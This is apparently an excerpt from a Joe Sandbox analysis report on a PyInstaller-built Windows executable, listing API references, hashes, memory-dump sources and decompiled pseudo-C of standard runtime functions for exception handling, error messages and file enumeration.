                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                        • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                        • Opcode ID: 46fb5d0366b8e1e712cdd684d815614daf2c7cda5b16cac76ba58e706ef79b66
                                                                                                                                                                                                                                                        • Instruction ID: 8f14f0e7e376e8bcda57a36af52b75c91b12d500e96b4b2db53fb1b7ec33a671
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46fb5d0366b8e1e712cdd684d815614daf2c7cda5b16cac76ba58e706ef79b66
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0B2D373B182828BE7649E68D4607F927A1FF54B88F405136DE09D7A88DF7AAD008F45
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00007FF6E5AB26A0), ref: 00007FF6E5AB74D7
                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(00000000,00007FF6E5AB26A0), ref: 00007FF6E5AB7506
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 00007FF6E5AB755C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E5AB7744,?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AB101D), ref: 00007FF6E5AB2654
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB2620: MessageBoxW.USER32 ref: 00007FF6E5AB272C
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                                                                        • API String ID: 2920928814-2573406579
                                                                                                                                                                                                                                                        • Opcode ID: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                                                                                                                                                                                                                        • Instruction ID: e6e0037bdce79662eddeb6991e4c33787006016d00e180c090fc910a419b92e3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23218673B08A4681E760AF18E8743756361FF48B88F840135DA4DC2698EF7ED905CB49
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                        • Opcode ID: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                                                                                                                                                                                                                        • Instruction ID: 8c25b18b1e6be28571ed37d31a27187f9ab7bbbaca1c8a10a6bb3e39d4fc6831
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F315073709A8586EB60AF64E8A03ED7360FB44B48F444439DA4DC7A98DF3DD948C715
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC9AE4(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
                                                                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                                                                        				signed long long _t60;
                                                                                                                                                                                                                                                        				long long _t63;
                                                                                                                                                                                                                                                        				_Unknown_base(*)()* _t82;
                                                                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                                                                                        				signed long long _t90;
                                                                                                                                                                                                                                                        				struct _EXCEPTION_POINTERS* _t95;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				 *((long long*)(_t89 + 0x10)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				_t87 = _t89 - 0x4f0;
                                                                                                                                                                                                                                                        				_t90 = _t89 - 0x5f0;
                                                                                                                                                                                                                                                        				_t60 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				 *(_t87 + 0x4e0) = _t60 ^ _t90;
                                                                                                                                                                                                                                                        				if (__ecx == 0xffffffff) goto 0xe5ac9b23;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB694(_t36);
                                                                                                                                                                                                                                                        				r8d = 0x98;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				r8d = 0x4d0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
                                                                                                                                                                                                                                                        				_t63 = _t87 + 0x10;
                                                                                                                                                                                                                                                        				 *((long long*)(_t90 + 0x50)) = _t63;
                                                                                                                                                                                                                                                        				__imp__RtlCaptureContext();
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				__imp__RtlLookupFunctionEntry();
                                                                                                                                                                                                                                                        				if (_t63 == 0) goto 0xe5ac9bb6;
                                                                                                                                                                                                                                                        				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
                                                                                                                                                                                                                                                        				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
                                                                                                                                                                                                                                                        				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
                                                                                                                                                                                                                                                        				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
                                                                                                                                                                                                                                                        				__imp__RtlVirtualUnwind();
                                                                                                                                                                                                                                                        				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
                                                                                                                                                                                                                                                        				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
                                                                                                                                                                                                                                                        				_t38 = IsDebuggerPresent();
                                                                                                                                                                                                                                                        				SetUnhandledExceptionFilter(_t82, _t86);
                                                                                                                                                                                                                                                        				if (UnhandledExceptionFilter(_t95) != 0) goto 0xe5ac9c18;
                                                                                                                                                                                                                                                        				if (_t38 != 0) goto 0xe5ac9c18;
                                                                                                                                                                                                                                                        				if (__ecx == 0xffffffff) goto 0xe5ac9c18;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(E00007FF67FF6E5ABB694(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                        0x7ff6e5ac9ae4
                                                                                                                                                                                                                                                        0x7ff6e5ac9ae9
                                                                                                                                                                                                                                                        0x7ff6e5ac9af2
                                                                                                                                                                                                                                                        0x7ff6e5ac9afa
                                                                                                                                                                                                                                                        0x7ff6e5ac9b01
                                                                                                                                                                                                                                                        0x7ff6e5ac9b0b
                                                                                                                                                                                                                                                        0x7ff6e5ac9b1c
                                                                                                                                                                                                                                                        0x7ff6e5ac9b1e
                                                                                                                                                                                                                                                        0x7ff6e5ac9b2a
                                                                                                                                                                                                                                                        0x7ff6e5ac9b30
                                                                                                                                                                                                                                                        0x7ff6e5ac9b3b
                                                                                                                                                                                                                                                        0x7ff6e5ac9b41
                                                                                                                                                                                                                                                        0x7ff6e5ac9b4b
                                                                                                                                                                                                                                                        0x7ff6e5ac9b54
                                                                                                                                                                                                                                                        0x7ff6e5ac9b58
                                                                                                                                                                                                                                                        0x7ff6e5ac9b5d
                                                                                                                                                                                                                                                        0x7ff6e5ac9b72
                                                                                                                                                                                                                                                        0x7ff6e5ac9b75
                                                                                                                                                                                                                                                        0x7ff6e5ac9b7e
                                                                                                                                                                                                                                                        0x7ff6e5ac9b80
                                                                                                                                                                                                                                                        0x7ff6e5ac9b93
                                                                                                                                                                                                                                                        0x7ff6e5ac9ba0
                                                                                                                                                                                                                                                        0x7ff6e5ac9ba9
                                                                                                                                                                                                                                                        0x7ff6e5ac9bb0
                                                                                                                                                                                                                                                        0x7ff6e5ac9bbd
                                                                                                                                                                                                                                                        0x7ff6e5ac9bcf
                                                                                                                                                                                                                                                        0x7ff6e5ac9bd3
                                                                                                                                                                                                                                                        0x7ff6e5ac9be1
                                                                                                                                                                                                                                                        0x7ff6e5ac9be5
                                                                                                                                                                                                                                                        0x7ff6e5ac9be9
                                                                                                                                                                                                                                                        0x7ff6e5ac9bf3
                                                                                                                                                                                                                                                        0x7ff6e5ac9c06
                                                                                                                                                                                                                                                        0x7ff6e5ac9c0a
                                                                                                                                                                                                                                                        0x7ff6e5ac9c0f
                                                                                                                                                                                                                                                        0x7ff6e5ac9c3e

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                        • Opcode ID: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                                                                                                                                                                                                                        • Instruction ID: f9325e406a32b7f8353f46cac87a027cf5c81fe2404aaae7ca8641c1933d30e1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D316033718B818ADB60DF29E8503AE73A0FF88B54F500135EA8D87B58DF39D9458B45
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD09B4(void* __ecx, long long __rbx, intOrPtr* __rcx, void** __rdx) {
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				void* __r15;
                                                                                                                                                                                                                                                        				signed int _t70;
                                                                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                                                                        				signed int _t96;
                                                                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                                                                        				void* _t113;
                                                                                                                                                                                                                                                        				signed long long _t140;
                                                                                                                                                                                                                                                        				signed long long _t141;
                                                                                                                                                                                                                                                        				intOrPtr _t142;
                                                                                                                                                                                                                                                        				signed short* _t143;
                                                                                                                                                                                                                                                        				intOrPtr* _t145;
                                                                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                                                                        				intOrPtr* _t154;
                                                                                                                                                                                                                                                        				intOrPtr* _t156;
                                                                                                                                                                                                                                                        				intOrPtr* _t159;
                                                                                                                                                                                                                                                        				long long _t160;
                                                                                                                                                                                                                                                        				intOrPtr* _t161;
                                                                                                                                                                                                                                                        				signed short* _t167;
                                                                                                                                                                                                                                                        				signed short* _t168;
                                                                                                                                                                                                                                                        				signed long long _t180;
                                                                                                                                                                                                                                                        				signed long long _t182;
                                                                                                                                                                                                                                                        				long long _t186;
                                                                                                                                                                                                                                                        				signed long long _t202;
                                                                                                                                                                                                                                                        				void* _t207;
                                                                                                                                                                                                                                                        				intOrPtr* _t211;
                                                                                                                                                                                                                                                        				intOrPtr* _t212;
                                                                                                                                                                                                                                                        				void* _t214;
                                                                                                                                                                                                                                                        				intOrPtr _t220;
                                                                                                                                                                                                                                                        				void* _t222;
                                                                                                                                                                                                                                                        				void* _t223;
                                                                                                                                                                                                                                                        				void* _t225;
                                                                                                                                                                                                                                                        				signed long long _t226;
                                                                                                                                                                                                                                                        				void* _t228;
                                                                                                                                                                                                                                                        				void* _t239;
                                                                                                                                                                                                                                                        				signed long long _t240;
                                                                                                                                                                                                                                                        				long long _t241;
                                                                                                                                                                                                                                                        				void* _t244;
                                                                                                                                                                                                                                                        				union _FINDEX_INFO_LEVELS _t249;
                                                                                                                                                                                                                                                        				signed short* _t250;
                                                                                                                                                                                                                                                        				signed long long _t254;
                                                                                                                                                                                                                                                        				intOrPtr* _t255;
                                                                                                                                                                                                                                                        				WCHAR* _t258;
                                                                                                                                                                                                                                                        				signed long long _t260;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				 *((long long*)(_t225 + 0x18)) = __rbx;
                                                                                                                                                                                                                                                        				_t223 = _t225 - 0x1c0;
                                                                                                                                                                                                                                                        				_t226 = _t225 - 0x2c0;
                                                                                                                                                                                                                                                        				_t140 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t141 = _t140 ^ _t226;
                                                                                                                                                                                                                                                        				 *(_t223 + 0x1b8) = _t141;
                                                                                                                                                                                                                                                        				r12d = 0;
                                                                                                                                                                                                                                                        				 *((long long*)(_t226 + 0x50)) = __rdx;
                                                                                                                                                                                                                                                        				if (__rdx != 0) goto 0xe5ad0a0c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t141);
                                                                                                                                                                                                                                                        				_t5 = _t239 + 0x16; // 0x16
                                                                                                                                                                                                                                                        				 *_t141 = _t5;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				goto 0xe5ad0d64;
                                                                                                                                                                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                                                                                                                                                                        				 *__rdx = _t239;
                                                                                                                                                                                                                                                        				_t142 =  *((intOrPtr*)(__rcx));
                                                                                                                                                                                                                                                        				asm("movdqu [esp+0x30], xmm0");
                                                                                                                                                                                                                                                        				 *(_t226 + 0x40) = _t239;
                                                                                                                                                                                                                                                        				if (_t142 == 0) goto 0xe5ad0c3c;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t223 + 0x1b0)) = 0x3f002a;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t223 + 0x1b4)) = r12w;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACE600(_t142, _t223 + 0x1b0);
                                                                                                                                                                                                                                                        				_t250 =  *((intOrPtr*)(__rcx));
                                                                                                                                                                                                                                                        				if (_t142 != 0) goto 0xe5ad0a94;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				_t167 = _t250;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD0DA4(0x801, _t167, _t223 + 0x1b0,  *((intOrPtr*)(_t226 + 0x38)), _t228, _t226 + 0x30) != 0) goto 0xe5ad0be5;
                                                                                                                                                                                                                                                        				goto 0xe5ad0bd9;
                                                                                                                                                                                                                                                        				if (_t142 == _t250) goto 0xe5ad0ab8;
                                                                                                                                                                                                                                                        				_t109 = ( *_t167 & 0x0000ffff) - 0x2f - 0x2d;
                                                                                                                                                                                                                                                        				if (_t109 > 0) goto 0xe5ad0aaf;
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				if (_t109 < 0) goto 0xe5ad0ab8;
                                                                                                                                                                                                                                                        				_t168 = _t167 - 2;
                                                                                                                                                                                                                                                        				if (_t168 != _t250) goto 0xe5ad0a99;
                                                                                                                                                                                                                                                        				_t96 =  *_t168 & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t96 != 0x3a) goto 0xe5ad0aca;
                                                                                                                                                                                                                                                        				_t143 =  &(_t250[1]);
                                                                                                                                                                                                                                                        				if (_t168 != _t143) goto 0xe5ad0b19;
                                                                                                                                                                                                                                                        				_t113 = _t96 - 0x2f - 0x2d;
                                                                                                                                                                                                                                                        				if (_t113 > 0) goto 0xe5ad0adf;
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				if (_t113 < 0) goto 0xe5ad0ae2;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t226 + 0x28)) = r12d;
                                                                                                                                                                                                                                                        				 *(_t226 + 0x20) = _t239;
                                                                                                                                                                                                                                                        				asm("dec ebp");
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				FindFirstFileExW(_t258, _t249, _t244);
                                                                                                                                                                                                                                                        				if (_t143 != 0xffffffff) goto 0xe5ad0b45;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD0DA4(_t143, _t250, _t239,  *((intOrPtr*)(_t226 + 0x38)), _t239, _t226 + 0x30) != 0) goto 0xe5ad0c14;
                                                                                                                                                                                                                                                        				goto 0xe5ad0bd9;
                                                                                                                                                                                                                                                        				_t240 =  *((intOrPtr*)(_t226 + 0x38)) -  *((intOrPtr*)(_t226 + 0x30)) >> 3;
                                                                                                                                                                                                                                                        				if ( *((short*)(_t223 - 0x74)) != 0x2e) goto 0xe5ad0b6d;
                                                                                                                                                                                                                                                        				_t70 =  *(_t223 - 0x72) & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t70 == 0) goto 0xe5ad0b8b;
                                                                                                                                                                                                                                                        				if (_t70 != 0x2e) goto 0xe5ad0b6d;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t223 - 0x70)) == 0) goto 0xe5ad0b8b;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD0DA4(_t143, _t223 - 0x74, _t250,  *((intOrPtr*)(_t226 + 0x38)) -  *((intOrPtr*)(_t226 + 0x30)) >> 3, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001, _t226 + 0x30) != 0) goto 0xe5ad0c0b;
                                                                                                                                                                                                                                                        				if (FindNextFileW(_t239) != 0) goto 0xe5ad0b51;
                                                                                                                                                                                                                                                        				_t220 =  *((intOrPtr*)(_t226 + 0x38));
                                                                                                                                                                                                                                                        				_t211 =  *((intOrPtr*)(_t226 + 0x30));
                                                                                                                                                                                                                                                        				if (_t240 == _t220 - _t211 >> 3) goto 0xe5ad0bcd;
                                                                                                                                                                                                                                                        				_t33 =  &(_t143[4]); // 0x8
                                                                                                                                                                                                                                                        				r8d = _t33;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD67C0(_t143, _t211 + _t240 * 8, (_t220 - _t211 >> 3) - _t240, _t211, _t220, _t223, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001, 0x7ff6e5ad09a0, __rcx);
                                                                                                                                                                                                                                                        				FindClose(_t207);
                                                                                                                                                                                                                                                        				r12d = 0;
                                                                                                                                                                                                                                                        				_t260 = __rcx + 8;
                                                                                                                                                                                                                                                        				goto 0xe5ad0a2a;
                                                                                                                                                                                                                                                        				_t154 = _t211;
                                                                                                                                                                                                                                                        				if (_t211 ==  *((intOrPtr*)(_t226 + 0x38))) goto 0xe5ad0cb7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18( *_t260,  *_t154);
                                                                                                                                                                                                                                                        				if (_t154 + 8 !=  *((intOrPtr*)(_t226 + 0x38))) goto 0xe5ad0bf3;
                                                                                                                                                                                                                                                        				goto 0xe5ad0cb7;
                                                                                                                                                                                                                                                        				FindClose(_t214);
                                                                                                                                                                                                                                                        				_t212 =  *((intOrPtr*)(_t226 + 0x30));
                                                                                                                                                                                                                                                        				_t156 = _t212;
                                                                                                                                                                                                                                                        				if (_t212 ==  *((intOrPtr*)(_t226 + 0x38))) goto 0xe5ad0cb7;
                                                                                                                                                                                                                                                        				_t180 =  *_t156;
                                                                                                                                                                                                                                                        				_t77 = E00007FF67FF6E5AC9E18( *_t260, _t180);
                                                                                                                                                                                                                                                        				if (_t156 + 8 !=  *((intOrPtr*)(_t226 + 0x38))) goto 0xe5ad0c27;
                                                                                                                                                                                                                                                        				goto 0xe5ad0cb7;
                                                                                                                                                                                                                                                        				_t202 = _t240;
                                                                                                                                                                                                                                                        				 *(_t226 + 0x48) = _t202;
                                                                                                                                                                                                                                                        				_t145 = _t212;
                                                                                                                                                                                                                                                        				_t254 = (_t220 - _t212 >> 3) + 1;
                                                                                                                                                                                                                                                        				if (_t212 == _t220) goto 0xe5ad0c7e;
                                                                                                                                                                                                                                                        				_t182 = (_t180 | 0xffffffff) + 1;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *_t145 + _t182 * 2)) != r12w) goto 0xe5ad0c60;
                                                                                                                                                                                                                                                        				_t146 = _t145 + 8;
                                                                                                                                                                                                                                                        				if (_t146 != _t220) goto 0xe5ad0c59;
                                                                                                                                                                                                                                                        				 *(_t226 + 0x48) = _t202 + 1 + _t182;
                                                                                                                                                                                                                                                        				r8d = 2;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC7E0C(_t77, _t254, _t202 + 1 + _t182, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001);
                                                                                                                                                                                                                                                        				if (_t146 != 0) goto 0xe5ad0cc6;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t146, _t254);
                                                                                                                                                                                                                                                        				_t159 = _t212;
                                                                                                                                                                                                                                                        				if (_t212 == _t220) goto 0xe5ad0cb4;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t146,  *_t159);
                                                                                                                                                                                                                                                        				_t160 = _t159 + 8;
                                                                                                                                                                                                                                                        				if (_t160 != _t220) goto 0xe5ad0ca3;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t146, _t212);
                                                                                                                                                                                                                                                        				goto 0xe5ad0d64;
                                                                                                                                                                                                                                                        				_t186 = _t146 + _t254 * 8;
                                                                                                                                                                                                                                                        				_t255 = _t212;
                                                                                                                                                                                                                                                        				 *((long long*)(_t223 + 0x1b0)) = _t186;
                                                                                                                                                                                                                                                        				_t241 = _t186;
                                                                                                                                                                                                                                                        				if (_t212 == _t220) goto 0xe5ad0d32;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *_t255 + ((_t260 | 0xffffffff) + 1) * 2)) != 0) goto 0xe5ad0ceb;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD08A0(_t241 - _t186 >> 1, _t160, _t241,  *(_t226 + 0x48) - (_t241 - _t186 >> 1), _t220,  *_t255, (_t260 | 0xffffffff) + 2, _t222) != 0) goto 0xe5ad0d8e;
                                                                                                                                                                                                                                                        				 *((long long*)(_t255 + _t160 - _t212)) = _t241;
                                                                                                                                                                                                                                                        				if (_t255 + 8 != _t220) goto 0xe5ad0ce2;
                                                                                                                                                                                                                                                        				 *((long long*)( *((intOrPtr*)(_t226 + 0x50)))) = _t160;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18( *((intOrPtr*)(_t226 + 0x50)),  *((intOrPtr*)(_t223 + 0x1b0)));
                                                                                                                                                                                                                                                        				_t161 = _t212;
                                                                                                                                                                                                                                                        				if (_t212 == _t220) goto 0xe5ad0d5a;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18( *((intOrPtr*)(_t226 + 0x50)),  *_t161);
                                                                                                                                                                                                                                                        				if (_t161 + 8 != _t220) goto 0xe5ad0d49;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18( *((intOrPtr*)(_t226 + 0x50)), _t212);
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(0, 0,  *(_t223 + 0x1b8) ^ _t226);
                                                                                                                                                                                                                                                        			}

















































                                                                                                                                                                                                                                                        0x7ff6e5ad09b4
                                                                                                                                                                                                                                                        0x7ff6e5ad09c4
                                                                                                                                                                                                                                                        0x7ff6e5ad09cc
                                                                                                                                                                                                                                                        0x7ff6e5ad09d3
                                                                                                                                                                                                                                                        0x7ff6e5ad09da
                                                                                                                                                                                                                                                        0x7ff6e5ad09dd
                                                                                                                                                                                                                                                        0x7ff6e5ad09e4
                                                                                                                                                                                                                                                        0x7ff6e5ad09e7
                                                                                                                                                                                                                                                        0x7ff6e5ad09f2
                                                                                                                                                                                                                                                        0x7ff6e5ad09f4
                                                                                                                                                                                                                                                        0x7ff6e5ad09f9
                                                                                                                                                                                                                                                        0x7ff6e5ad09fe
                                                                                                                                                                                                                                                        0x7ff6e5ad0a00
                                                                                                                                                                                                                                                        0x7ff6e5ad0a07
                                                                                                                                                                                                                                                        0x7ff6e5ad0a0c
                                                                                                                                                                                                                                                        0x7ff6e5ad0a0f
                                                                                                                                                                                                                                                        0x7ff6e5ad0a12
                                                                                                                                                                                                                                                        0x7ff6e5ad0a15
                                                                                                                                                                                                                                                        0x7ff6e5ad0a25
                                                                                                                                                                                                                                                        0x7ff6e5ad0a2d
